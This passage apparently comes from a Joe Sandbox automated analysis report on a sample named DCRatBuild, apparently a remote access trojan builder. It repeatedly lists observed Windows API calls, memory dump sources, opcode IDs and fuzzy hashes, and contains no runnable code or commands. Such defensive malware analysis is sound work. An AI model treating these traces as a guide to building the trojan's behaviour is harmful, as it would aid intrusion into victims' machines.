                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 57cb17f7bbe17c1b0385acb4a5f470ff8fc53cda37e2fe9eadc7820cf2bab1d0
                                  • Instruction ID: 489c404538b3895a76e37f15f96de74fe8a8941c8038c94cd8102445afd91720
                                  • Opcode Fuzzy Hash: 57cb17f7bbe17c1b0385acb4a5f470ff8fc53cda37e2fe9eadc7820cf2bab1d0
                                  • Instruction Fuzzy Hash: 6FF0A03124120DBBDF016F60DC05FDA776DFB04381F04C056BC88E6261DB72CAA8AA51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemText_swprintf
                                  • String ID:
                                  • API String ID: 3011073432-0
                                  • Opcode ID: a5f5b11682432eb7c9f083df785006150d15587624678aeae73f9a98ce5e7814
                                  • Instruction ID: 329ff48461684f3797d9c96ed7a095690a009530f73d343c9551e6c53df31868
                                  • Opcode Fuzzy Hash: a5f5b11682432eb7c9f083df785006150d15587624678aeae73f9a98ce5e7814
                                  • Instruction Fuzzy Hash: 9DF0553160838C7BEB11ABB5CC02FAA371CFB06745F000692B600D31F2DE316A20AB63
                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,?,008D984C,?,?,008D9688,?,?,?,?,00901FA1,000000FF), ref: 008DA13E
                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,008D984C,?,?,008D9688,?,?,?,?,00901FA1,000000FF), ref: 008DA16C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: c96089ede3c7df0737823107e80e157a7e2954cb55d5aaa212b1028119cc4214
                                  • Instruction ID: c2c42568beb473ec0fb3e322153fa278a4518c536fb02338bf296ce6f5d1a4c4
                                  • Opcode Fuzzy Hash: c96089ede3c7df0737823107e80e157a7e2954cb55d5aaa212b1028119cc4214
                                  • Instruction Fuzzy Hash: 71E09235651209ABDB11AF65DC41FE9776CFB08381F488166B888C3260DB61DD94AA91
                                  APIs
                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00901FA1,000000FF), ref: 008EA3D1
                                  • OleUninitialize.OLE32(?,?,?,?,00901FA1,000000FF), ref: 008EA3D6
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: GdiplusShutdownUninitialize
                                  • String ID:
                                  • API String ID: 3856339756-0
                                  • Opcode ID: 43d59092b118bb8c0dcfc0cea4f0346f2c4f2fbad484c156477f4a019c558df9
                                  • Instruction ID: 3853774d06215fcdf557f4e5e5fcf339ac8e2184af8a1c7a29e31d35ad901795
                                  • Opcode Fuzzy Hash: 43d59092b118bb8c0dcfc0cea4f0346f2c4f2fbad484c156477f4a019c558df9
                                  • Instruction Fuzzy Hash: B0F0307261C655DFC7109B4DDD05B55FBADFB89B20F04836AF519837A0CB746800DA91
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,?,008DA189,?,008D76B2,?,?,?,?), ref: 008DA1A5
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,008DA189,?,008D76B2,?,?,?,?), ref: 008DA1D1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 0179e3d4cb555dfd14a8aae2639829ac50675fbbbf5b268a9bf33979c0c786e7
                                  • Instruction ID: 4b29587b8d9771bda625fe574cc09f82042bbaeec2234b4fccb385e98642aab8
                                  • Opcode Fuzzy Hash: 0179e3d4cb555dfd14a8aae2639829ac50675fbbbf5b268a9bf33979c0c786e7
                                  • Instruction Fuzzy Hash: D2E06D355001289BDF20AA689C05BD9B76CFB083A1F0042A2BD55E3690DA70DD449AE1
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystem
                                  • String ID:
                                  • API String ID: 1175261203-0
                                  • Opcode ID: 969505957bd9e14ff1690aa81320edf174b0c8615e8d81529861024b1dfbe2ca
                                  • Instruction ID: ffe7736f278b50a09fb938af1d809662cb5f23b843b4940da7093d70ea2b75a7
                                  • Opcode Fuzzy Hash: 969505957bd9e14ff1690aa81320edf174b0c8615e8d81529861024b1dfbe2ca
                                  • Instruction Fuzzy Hash: C2E0927691115CAACB209AA59C04FD6776CFF09382F0400A6B908D3104DAB09A808BA1
                                  APIs
                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008E9B30
                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 008E9B37
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: BitmapCreateFromGdipStream
                                  • String ID:
                                  • API String ID: 1918208029-0
                                  • Opcode ID: b44a5b4843c1b620365fb1db82dfeee0a2fcf9e2824dfd9c9e2f4a727549be90
                                  • Instruction ID: fd2cd13e4f43d6403d77cd19179fe861efb309c200446514afef911c50ab3eb3
                                  • Opcode Fuzzy Hash: b44a5b4843c1b620365fb1db82dfeee0a2fcf9e2824dfd9c9e2f4a727549be90
                                  • Instruction Fuzzy Hash: E0E0ED71901218EFCB20DF99D501699B7E8FB09321F10805BF999D3300E6B16E549B91
                                  APIs
                                    • Part of subcall function 008F329A: try_get_function.LIBVCRUNTIME ref: 008F32AF
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008F217A
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008F2185
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                  • String ID:
                                  • API String ID: 806969131-0
                                  • Opcode ID: 8660a7fdcdd010ccfb8e134c1d3dbb5cf4491c64f251c1e3a941645ea9a74c5e
                                  • Instruction ID: f75abfd2d02e9300cd9695b5cca8ae76770d4b2d51de915214c1745a7e15c88e
                                  • Opcode Fuzzy Hash: 8660a7fdcdd010ccfb8e134c1d3dbb5cf4491c64f251c1e3a941645ea9a74c5e
                                  • Instruction Fuzzy Hash: 6CD0A72510830E24690826B878420F83344F891B783F00B45E320C51D1EE116084741A
                                  APIs
                                  • DloadLock.DELAYIMP ref: 008EDC73
                                  • DloadProtectSection.DELAYIMP ref: 008EDC8F
                                    • Part of subcall function 008EDE67: DloadObtainSection.DELAYIMP ref: 008EDE77
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Dload$Section$LockObtainProtect
                                  • String ID:
                                  • API String ID: 731663317-0
                                  • Opcode ID: 640b5e93eb0e63c0d9fa0b112d67296f4aa68b67364331c12f6ac0bbac0ab63e
                                  • Instruction ID: a41340ced58fa0982866221543e2c3c1c62c65399ba4b19144421caf15c86d9d
                                  • Opcode Fuzzy Hash: 640b5e93eb0e63c0d9fa0b112d67296f4aa68b67364331c12f6ac0bbac0ab63e
                                  • Instruction Fuzzy Hash: D0D012701183C18EC211EB1A9D5A75D3670F787789F742601F196C75A0DFF44488EE07
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemShowWindow
                                  • String ID:
                                  • API String ID: 3351165006-0
                                  • Opcode ID: 419f93280669c1bd16dd130f8171a00014840b0a4de5e662241c3055642d88f7
                                  • Instruction ID: afe772fd5e4e136a28076678075a5dfbde5ddccefaa233a746cfde5926e4c2af
                                  • Opcode Fuzzy Hash: 419f93280669c1bd16dd130f8171a00014840b0a4de5e662241c3055642d88f7
                                  • Instruction Fuzzy Hash: 1BC0123206C200BECB010BB0ED09D2FBBA8ABA4212F05C928B6A5C0060C238C010EF11
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: d9845094a64fd68aa4e8f9827ccf8ac26e2548d8441d3b9e32d1468208990f14
                                  • Instruction ID: c6165d9a600a7ab6f7bd1281cb194f10c58ff0c66f1bbd8573bd4710e58fa5dc
                                  • Opcode Fuzzy Hash: d9845094a64fd68aa4e8f9827ccf8ac26e2548d8441d3b9e32d1468208990f14
                                  • Instruction Fuzzy Hash: A4C1A130A04254AFEF15CF68C498BA97BA5FF0A314F1842BBEC45DB386DB319944CB61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 5fbd20934f50a9c4166a52fdfd76f1bee3beeffdc4d7eca12c1ccc712c0c1f60
                                  • Instruction ID: e66aec1c180f9d14690d5be03af13a7698b33136e7cb18a6547db2249357fafc
                                  • Opcode Fuzzy Hash: 5fbd20934f50a9c4166a52fdfd76f1bee3beeffdc4d7eca12c1ccc712c0c1f60
                                  • Instruction Fuzzy Hash: AF71AF71504B48AEDB25DB74CC41AE7B7E9FB14301F444A6FE5AAC7242DA326A48CF12
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D8384
                                    • Part of subcall function 008D1380: __EH_prolog.LIBCMT ref: 008D1385
                                    • Part of subcall function 008D1380: new.LIBCMT ref: 008D13FE
                                    • Part of subcall function 008D19A6: __EH_prolog.LIBCMT ref: 008D19AB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 4b370fe53f9e65a3d5e8226f50e9cce6df49346692984a28b1aabdd43570ea0a
                                  • Instruction ID: 8b5e3852b8dad9ce42d6a51c295cd9a57ed5e3ab1b9252a54c0ea8b2d9b43b27
                                  • Opcode Fuzzy Hash: 4b370fe53f9e65a3d5e8226f50e9cce6df49346692984a28b1aabdd43570ea0a
                                  • Instruction Fuzzy Hash: 2241CF318406589ADF20EB64CC55BEAB3A9FF10300F0441EBE58AE3292DF745EC8DB51
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D1E05
                                    • Part of subcall function 008D3B3D: __EH_prolog.LIBCMT ref: 008D3B42
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 226f1864bc86c2b4a1fced2843469b6ef261db68515a1c979866cec24c464052
                                  • Instruction ID: 3b663eb429113eb62c80fece79af8fd462122d0d5241639ef5a633cccc390915
                                  • Opcode Fuzzy Hash: 226f1864bc86c2b4a1fced2843469b6ef261db68515a1c979866cec24c464052
                                  • Instruction Fuzzy Hash: 83212672904248AECF11EFA9D9459EEBBF6FF59300B10026EE845A7351CB325E10CB61
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008EA7C8
                                    • Part of subcall function 008D1380: __EH_prolog.LIBCMT ref: 008D1385
                                    • Part of subcall function 008D1380: new.LIBCMT ref: 008D13FE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 6428ac599d7f8c98ce7ffe2434066b563a6edec541cc63234b334083b93aaf4d
                                  • Instruction ID: 2df69f05ca37ea377bc21ef4fa9b2a79136d2b76d99200d0785e15e2c4e50932
                                  • Opcode Fuzzy Hash: 6428ac599d7f8c98ce7ffe2434066b563a6edec541cc63234b334083b93aaf4d
                                  • Instruction Fuzzy Hash: 16216D71C04299AECF15DF99C9525EEB7B4FF1A304F0005AAE809E3342DB356E06CB62
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 43e1eeec3563d3fc7dffc84d67601d0e0ea227860591d9a486180d792c612642
                                  • Instruction ID: d55060d8a2ba108d3544741de50ff9d295d07284f1ce8fbf0526b3a36293814f
                                  • Opcode Fuzzy Hash: 43e1eeec3563d3fc7dffc84d67601d0e0ea227860591d9a486180d792c612642
                                  • Instruction Fuzzy Hash: 77118E73A50529ABCF26AEACCC419DEB736FF48750F054316F804E7391DA348D1087A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction ID: 941f0886a7f313f37a1cc115e01f39b09cac18a6c28af34f0ff7d8856ea11f77
                                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction Fuzzy Hash: F0F08C3050072A9FDB38EE69C94172AB7E8FB21320F308B1BE496C2780E770D880C742
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D5BDC
                                    • Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 8fe765608b4f6ca955d713992a497664ad8e26b20da76fb69b84c2f76b6a0478
                                  • Instruction ID: c5ce6a8bf8591c52c8e432eef3a97d0a98ba47ecfc0394deacade393f6aa09a3
                                  • Opcode Fuzzy Hash: 8fe765608b4f6ca955d713992a497664ad8e26b20da76fb69b84c2f76b6a0478
                                  • Instruction Fuzzy Hash: BB016D34A05684DAC725F7A8C0553EDF7A4EF59710F80429EA95A933C3CBB41B08D7A3
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
